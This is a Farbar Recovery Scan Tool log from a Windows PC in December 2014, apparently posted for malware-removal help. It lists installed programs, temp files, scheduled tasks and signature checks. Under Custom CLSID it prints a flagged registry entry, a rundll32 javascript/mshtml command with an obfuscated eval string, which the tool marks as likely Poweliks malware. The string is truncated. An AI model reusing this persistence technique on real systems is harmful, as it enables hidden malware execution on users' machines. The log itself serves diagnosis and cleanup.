2014-12-09 20:57 - 2012-05-01 09:40 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-12-09 20:57 - 2011-09-16 11:39 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-12-04 18:35 - 2014-11-16 13:51 - 00001062 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-12-04 18:35 - 2014-06-16 19:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-12-04 18:35 - 2014-06-16 19:18 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware

Files to move or delete:
====================
C:\Users\Randy\CTX.DAT

Some content of TEMP:
====================
C:\Users\Randy\AppData\Local\Temp\ITPx86_1033.exe
C:\Users\Randy\AppData\Local\Temp\jre-6u24-windows-i586-iftw-rv.exe
C:\Users\Randy\AppData\Local\Temp\jre-6u26-windows-i586-iftw-rv.exe
C:\Users\Randy\AppData\Local\Temp\jre-6u29-windows-i586-iftw-rv.exe
C:\Users\Randy\AppData\Local\Temp\jre-6u31-windows-i586-iftw-rv.exe
C:\Users\Randy\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exe
C:\Users\Randy\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exe
C:\Users\Randy\AppData\Local\Temp\jre-6u39-windows-i586-iftw.exe
C:\Users\Randy\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\Randy\AppData\Local\Temp\jre-7u21-windows-i586-iftw.exe
C:\Users\Randy\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\Randy\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\Randy\AppData\Local\Temp\jre-7u55-windows-i586-iftw.exe
C:\Users\Randy\AppData\Local\Temp\jre-7u67-windows-i586-iftw.exe
C:\Users\Randy\AppData\Local\Temp\MouseKeyboardCenterx86_1033.exe
C:\Users\Randy\AppData\Local\Temp\MSN5294.exe
C:\Users\Randy\AppData\Local\Temp\ose00000.exe
C:\Users\Randy\AppData\Local\Temp\_is15D1.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-12-26 19:36

==================== End Of Log ============================

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 14-12-2014 01
Ran by Randy at 2014-12-15 21:58:19
Running from C:\Users\Randy\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Client/Server Security Agent Antivirus (Enabled - Up to date) {F2F88E6A-3C7A-545F-268A-5D0BDD38EE06}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Trend Micro Client/Server Security Agent Anti-spyware (Enabled - Up to date) {49996F8E-1A40-5BD1-1C3A-6679A6BFA4BB}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ABBYY FineReader 6.0 Sprint (HKLM\...\{ACF60000-22B9-4CE9-98D6-2CCF359BAC07}) (Version: 6.00.1395.4512 - ABBYY Software House)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.6.0.19120 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.246 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM\...\Adobe Shockwave Player) (Version: 12.0.5.146 - Adobe Systems, Inc.)
ANT Drivers Installer x86 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
APC PowerChute Personal Edition 3.0 (HKLM\...\{F1486DE6-CC2E-48C0-AD20-C2C142FA1636}) (Version: 3.0 - American Power Conversion)
BioAPI Framework (Version: 1.0.1 - Dell Inc.) Hidden
Broadcom NetXtreme-I Netlink Driver and Management Installer (HKLM\...\{982E1601-0DFC-4FD3-A427-AC6570697858}) (Version: 14.0.3.2 - Broadcom Corporation)
ccc-core-static (Version: 2010.0127.2258.41203 - ATI) Hidden
Creative Audio Control Panel (HKLM\...\AudioCS) (Version: 3.00 - Creative Technology Limited)
Creative Software AutoUpdate (HKLM\...\Creative Software AutoUpdate) (Version: 1.40 - Creative Technology Limited)
Creative Sound Blaster Properties (HKLM\...\Creative Sound Blaster Properties) (Version: 1.02 - Creative Technology Limited)
Crystal Reports for Visual Studio (Version: 12.51.0.240 - SAP) Hidden
CyberLink PowerDVD 9.5 (HKLM\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.5.1.3225 - CyberLink Corp.)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Control Point (Version: 1.6.468.86 - Broadcom Corporation) Hidden
Dell ControlPoint Security Manager (HKLM\...\{F4487649-7368-4217-AEA3-1E04DB3E2C5C}) (Version: 1.6.468.86 - Dell Inc.)
Dell Edoc Viewer (HKLM\...\{3138EAD3-700B-4A10-B617-B3F8096EE30D}) (Version: 1.0.0 - Dell Inc)
Dell Embassy Trust Suite by Wave Systems (Version: 03.05.04.002 - Wave Systems Corp) Hidden
Dell Printer Software (HKLM\...\{105F3CE5-FE55-408E-BF30-E78F85BA0B12}) (Version: 1.00.000 - Dell Inc.)
Dell Security Device Driver Pack (HKLM\...\{FF1DDCF4-3A28-4F7F-96D8-E3F4BD1C1702}) (Version: 1.4.055 - Dell Inc.)
Dell System Manager (HKLM\...\{C8B8C745-D288-41B4-9512-01E397F77449}) (Version: 1.5.00000 - Dell Inc.)
DeLorme Topo North America 9.0 (HKLM\...\{CA2AB87D-77FC-413E-A672-E7B9590BB762}) (Version: 9.100.14857 - DeLorme Publishing)
DirectX 9 Runtime (Version: 1.00.0000 - Sonic Solutions) Hidden
Document Manager Lite (Version: 06.09.00.159 - Wave Systems Corp.) Hidden
Dolby Digital Live Pack (HKLM\...\Dolby Digital Live Pack) (Version: 3.00 - Creative Technology Limited)
Dotfuscator Software Services - Community Edition (HKLM\...\{41B31ABE-5A6E-498A-8F28-3BA3B8779A41}) (Version: 5.0.2300.0 - PreEmptive Solutions)
Elevated Installer (Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden
EMBASSY Security Center (Version: 04.00.00.101 - Wave Systems Corp) Hidden
EMBASSY Security Setup (Version: 04.00.00.090 - Wave Systems Corp) Hidden
Epson Copy Utility 3.5 (HKLM\...\{AA72FB28-73B4-49E5-B6B4-E78F44BBD0AD}) (Version: 3.5.0.0 - )
Epson Event Manager (HKLM\...\{48F22622-1CC2-4A83-9C1E-644DD96F832D}) (Version: 2.30.01 - SEIKO EPSON Corporation)
EPSON Perfection V500 Photo Scanner Driver Update (HKLM\...\{25653817-9502-41A5-A24D-FED750611E98}) (Version:  - )
EPSON Perfection V500P User's Guide (HKLM\...\Silent Package Run-Time Sample) (Version:  - )
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - )
ESC Home Page Plugin (Version: 04.00.00.018 - Wave Systems Corp) Hidden
Garmin Express (HKLM\...\{817c6bb8-ea2d-4e12-abbc-e33c3de43f64}) (Version: 3.2.16.0 - Garmin Ltd or its subsidiaries)
Garmin Express (Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express Tray (Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin POI Loader (HKLM\...\{3213ED5E-7BBE-4613-BE69-8B1E4FE520DD}) (Version: 2.7.3 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM\...\{ABA5E381-EC46-425C-86C5-5CD15BBFB4BF}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GDR 1617 for SQL Server 2008 R2 (KB2494088) (HKLM\...\KB2494088) (Version: 10.50.1617.0 - Microsoft Corporation)
Gemalto (Version: 01.01.00.0000 - Wave Systems Corp) Hidden
Google Chrome (HKLM\...\Google Chrome) (Version: 39.0.2171.95 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
GoToAssist 8.0.0.514 (HKLM\...\GoToAssist) (Version:  - )
IconEdit2 v5.5 (HKLM\...\{55B16B14-E8F8-4401-9269-D3D02D393FD8}_is1) (Version:  - Dmitry G. Kozhinov)
Infragistics NetAdvantage 2003 Vol. 3 (HKLM\...\{49AC3206-DB85-4BF9-9927-FED14DEDE04D}) (Version: 3.3 - Infragistics, Inc.)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Java 7 Update 67 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217017FF}) (Version: 7.0.670 - Oracle)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools (HKLM\...\{40416836-56CC-4C0E-A6AF-5C34BADCE483}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 (HKLM\...\{1803A630-3C38-4D2B-9B9A-0CB37243539C}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft Help Viewer 1.0 (HKLM\...\Microsoft Help Viewer 1.0) (Version: 1.0.30319 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 1.1.500.0 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM\...\{90120000-00A4-0409-0000-0000000FF1CE}) (Version: 12.0.6213.1000 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-0011-0000-0000-0000000FF1CE}_PROPLUSR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM\...\PROPLUSR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Project Professional 2003 (HKLM\...\{903B0409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office Visio Professional 2003 (HKLM\...\{90510409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Report Viewer Redistributable 2008 SP1 (HKLM\...\Microsoft Report Viewer Redistributable 2008 (KB971119)) (Version:  - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20913.0 - Microsoft Corporation)
Microsoft Silverlight 3 SDK (HKLM\...\{2012098D-EEE9-4769-8DD3-B038050854D4}) (Version: 3.0.40818.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 (HKLM\...\Microsoft SQL Server 10 Release) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2008 R2 (HKLM\...\Microsoft SQL Server 2008 R2) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Books Online (HKLM\...\{74F7B314-0507-4F91-9A4E-B6C9B027E410}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Framework (HKLM\...\{0DDCEC37-369C-484B-B16D-B4413FD42FB9}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Project (HKLM\...\{E5AE9031-79A5-4627-9641-BEFA82819B08}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM\...\{4E968D9C-21A7-4915-B698-F7AEB913541D}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Native Client (HKLM\...\{046755CA-F677-4B7F-AF9A-6AB295A02A30}) (Version: 10.50.1617.0 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Policies (HKLM\...\{D21BC5B2-CBAC-48FA-A701-B5A63C1CA7B8}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Setup (English) (HKLM\...\{76866BE3-B2C7-40BB-B267-927792AED0C3}) (Version: 10.50.1617.0 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Transact-SQL Language Service (HKLM\...\{78C3657E-742C-40B1-9F53-E5A921D40F17}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Upgrade Advisor (HKLM\...\{6B79866B-7A56-493C-A0F5-7575F6AD98B8}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM\...\{D441BD04-E548-4F8E-97A4-1B66135BAAA8}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server Browser (HKLM\...\{BF9BF038-FE03-429D-9B26-2FA0FD756052}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM\...\{3A9FC03D-C685-4831-94CF-4EDFD3749497}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 Query Tools ENU (HKLM\...\{DDFD8348-058C-4F4B-85E5-6D740D4AB3FE}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Database Publishing Wizard 1.4 (HKLM\...\{ACE28263-76A4-4BF5-B6F4-8BD719595969}) (Version: 10.1.2512.8 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM\...\{A47FD1BF-A815-4A76-BE65-53A15BD5D25D}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{47BE41E6-2F0F-4D17-9C2D-3850FFD9D405}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft Sync Framework Runtime v1.0 SP1 (x86) (HKLM\...\{C6DD625F-4B61-4561-8286-87CA0275CEA1}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework SDK v1.0 SP1 (HKLM\...\{97CE8B73-AA5A-4987-A1BE-50DD1A187478}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework Services v1.0 SP1 (x86) (HKLM\...\{F990B526-8F7C-46E0-B1F1-6C893A8B478F}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Services for ADO.NET v2.0 SP1 (x86) (HKLM\...\{DC3D6AFB-78B4-489F-81D7-30B66E0C2417}) (Version: 2.0.3010.0 - Microsoft Corporation)
Microsoft Team Foundation Server 2010 Object Model - ENU (HKLM\...\Microsoft Team Foundation Server 2010 Object Model - ENU) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.30319 (HKLM\...\{6A86554B-8928-30E4-A53C-D7337689134D}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual F# 2.0 Runtime (HKLM\...\{729A3000-BC8A-3B74-BA5D-5068FE12D70C}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual FoxPro 9.0 Professional - English (HKLM\...\Visual FoxPro 9.0 Professional - English) (Version:  - Microsoft)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM\...\{14DD7530-CCD2-3798-B37D-3839ED6A441C}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Professional - ENU (HKLM\...\Microsoft Visual Studio 2010 Professional - ENU) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x86) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x86)) (Version: 10.0.40303 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools (HKLM\...\Microsoft Visual Studio Macro Tools) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM\...\{4ECF4BDC-8387-329A-ABE9-CF5798F84BB2}) (Version: 9.0.35191 - Microsoft Corporation)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NTRU TCG Software Stack (Version: 2.1.29 - NTRU Cryptosystems) Hidden
OpenAL (HKLM\...\OpenAL) (Version:  - )
PhotoShowExpress (Version: 2.0.028 - Sonic Solutions) Hidden
Preboot Manager (Version: 03.00.00.154 - Wave Systems Corp.) Hidden
Private Information Manager (Version: 06.04.00.065 - Wave Systems Corp.) Hidden
Roxio Burn (HKLM\...\{B2E47DE7-800B-40BB-BD1F-9F221C3AEE87}) (Version: 1.8.57.4 - Roxio)
Roxio Creator Starter (HKLM\...\{6F0BBEFE-BE1C-419B-BA1F-D36C9E7915BC}) (Version: 12.1.40.0 - Roxio)
Sagekey Access 2007 Deployment Wizard (HKLM\...\{D69AAFF8-A33D-485C-B21F-F01E07E06407}) (Version: 3.1.09 - SageKey Software Inc.)
Security Wizards (Version: 01.07.00.026 - Your Company Name) Hidden
Service Pack 1 for SQL Server 2008 (KB968369) (HKLM\...\KB968369) (Version: 10.1.2531.0 - Microsoft Corporation)
Skins (Version: 2010.0127.2258.41203 - ATI) Hidden
Sonic CinePlayer Decoder Pack (Version: 4.3.0 - Sonic Solutions) Hidden
Sound Blaster X-Fi (HKLM\...\{20288888-A7AF-4B24-8AEB-398D20CD563C}) (Version: 1.0 - )
SQL Server 2008 R2 Analysis Services (Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server 2008 R2 Client Tools (Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server 2008 R2 Common Files (Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server 2008 R2 Database Engine Services (Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server 2008 R2 Database Engine Shared (Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server 2008 R2 Full text search (Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server 2008 R2 Integration Services (Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server 2008 R2 Management Studio (Version: 10.50.1600.1 - Microsoft Corporation) Hidden
SQL Server 2008 R2 Reporting Services (Version: 10.50.1600.1 - Microsoft Corporation) Hidden
Sql Server Customer Experience Improvement Program (Version: 10.50.1600.1 - Microsoft Corporation) Hidden
swMSM (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Trend Micro Client/Server Security Agent (HKLM\...\{BED0B8A2-2986-49F8-90D6-FA008D37A3D2}) (Version: 3.0.3152 - Trend Micro)
Trusted Drive Manager (Version: 3.3.3.104 - Wave Systems Corp.) Hidden
TurboTax 2010 (HKLM\...\TurboTax 2010) (Version:  - Intuit, Inc)
TurboTax 2011 (HKLM\...\TurboTax 2011) (Version:  - Intuit, Inc)
TurboTax 2012 (HKLM\...\TurboTax 2012) (Version: 2012.0 - Intuit, Inc)
TurboTax 2013 (HKLM\...\TurboTax 2013) (Version: 2013.0 - Intuit, Inc)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-0011-0000-0000-0000000FF1CE}_PROPLUSR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
UPEK TouchChip Fingerprint Reader (Version: 1.2.0 - Dell Inc.) Hidden
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 ENU (HKLM\...\{112C23F2-C036-4D40-BED4-0CB47BF5555C}) (Version: 4.0.8080.0 - Microsoft Corporation)
Wave Infrastructure Installer (Version: 07.01.31.0000 - Wave Systems Corp) Hidden
Wave Support Software (Version: 05.10.00.073 - Wave Systems Corp) Hidden
Web Deployment Tool (HKLM\...\{0F37D969-1260-419E-B308-EF7D29ABDE20}) (Version: 1.1.0618 - Microsoft Corporation)
Windows Driver Package - Dell Inc. PBADRV System  (09/11/2009 1.0.1.6) (HKLM\...\9512AA21B791B05A54E27065C45BBC417AB282DF) (Version: 09/11/2009 1.0.1.6 - Dell Inc.)
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)
WinZip 16.0 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240CC}) (Version: 16.0.9715 - WinZip Computing, S.L. )
WinZip Courier (HKLM\...\{CD95F661-A5C4-11AF-B2CC-ABCD21A325B8}) (Version: 3.5.9658 - WinZip Computing, S.L. )

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-756768628-1363961526-1356878247-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

03-12-2014 02:00:22 Scheduled Checkpoint
04-12-2014 09:09:54 Windows Update
13-12-2014 02:42:52 Scheduled Checkpoint
13-12-2014 07:24:39 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:04 - 2009-06-10 16:39 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1488C445-F6F8-41B8-84A4-6E0FFAFBFD46} - System32\Tasks\Microsoft_Hardware_Launch_devicecenter_exe => c:\Program Files\Microsoft Device Center\devicecenter.exe [2012-06-26] (Microsoft)
Task: {5ADA6BE9-7D78-45A1-A0F4-EFB0CAA55C7B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-22] (Google Inc.)
Task: {62D2C444-1814-4DAD-9B7A-935106830A1C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-22] (Google Inc.)
Task: {7A9BDA7F-3F85-4CC6-8AE9-A16D177AA8F9} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Device Center\itype.exe [2012-06-26] (Microsoft Corporation)
Task: {937DC6D1-8E14-464C-9BF3-420366F5874D} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-12-09] (Adobe Systems Incorporated)
Task: {BDA8F6EB-51CA-481B-9B42-18B585564504} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Device Center\ipoint.exe [2012-06-26] (Microsoft Corporation)
Task: {E9994368-9AEC-4795-97DB-7DA64F5679A8} - System32\Tasks\GarminUpdaterTask => C:\Program Files\Garmin\Express Self Updater\ExpressSelfUpdater.exe [2014-07-23] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2010-01-19 13:44 - 2010-01-19 13:44 - 00249856 _____ () C:\Windows\system32\wxvault.dll
2011-01-19 18:31 - 2009-02-06 17:52 - 00073728 _____ () C:\Windows\SYSTEM32\CmdRtr.DLL
2011-01-19 18:31 - 2009-06-29 09:54 - 00164864 _____ () C:\Windows\SYSTEM32\APOMngr.DLL
2010-03-02 13:46 - 2010-03-02 13:46 - 00010752 _____ () C:\Windows\system32\Wavx_ESC_Logging.dll
2008-11-12 14:24 - 2008-11-12 14:24 - 00004608 _____ () C:\Program Files\NTRU Cryptosystems\NTRU TCG Software Stack\bin\TspPopup_ENU.dll
2010-07-07 11:33 - 2010-07-07 11:33 - 00002560 _____ () C:\Windows\CTXFIRES.DLL
2011-03-27 14:18 - 2009-03-12 14:45 - 00135168 ____N () C:\Program Files\Epson Software\Event Manager\Assistants\Scan Assistant\ScanEngine.dll
2011-03-27 14:18 - 2008-11-21 12:58 - 00057344 ____N () C:\Program Files\Epson Software\Event Manager\Assistants\Scan Assistant\Satwain.dll
2010-11-01 22:02 - 2010-11-01 22:02 - 00522736 _____ () C:\Program Files\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe
2010-08-30 04:34 - 2010-08-30 04:34 - 00375280 _____ () c:\program files\common files\roxio shared\dllshared\SQLite352.dll
2008-12-09 18:02 - 2008-12-09 18:02 - 00016384 ____R () c:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
2011-01-19 18:35 - 2011-01-19 18:35 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2011-03-28 22:06 - 2011-03-28 22:06 - 00854016 _____ () C:\Windows\assembly\GAC_32\System.Data.SQLite\1.0.61.0__db937bc2d44ff139\System.Data.SQLite.dll
2011-03-28 22:06 - 2011-03-28 22:06 - 00476520 _____ () C:\Windows\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\5.0.136.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll
2011-02-09 17:05 - 2013-10-23 05:01 - 00345112 _____ () c:\Program Files\Trend Micro\BM\TMBMSRV.exe

==================== Alternate Data Streams (whitelisted) =========

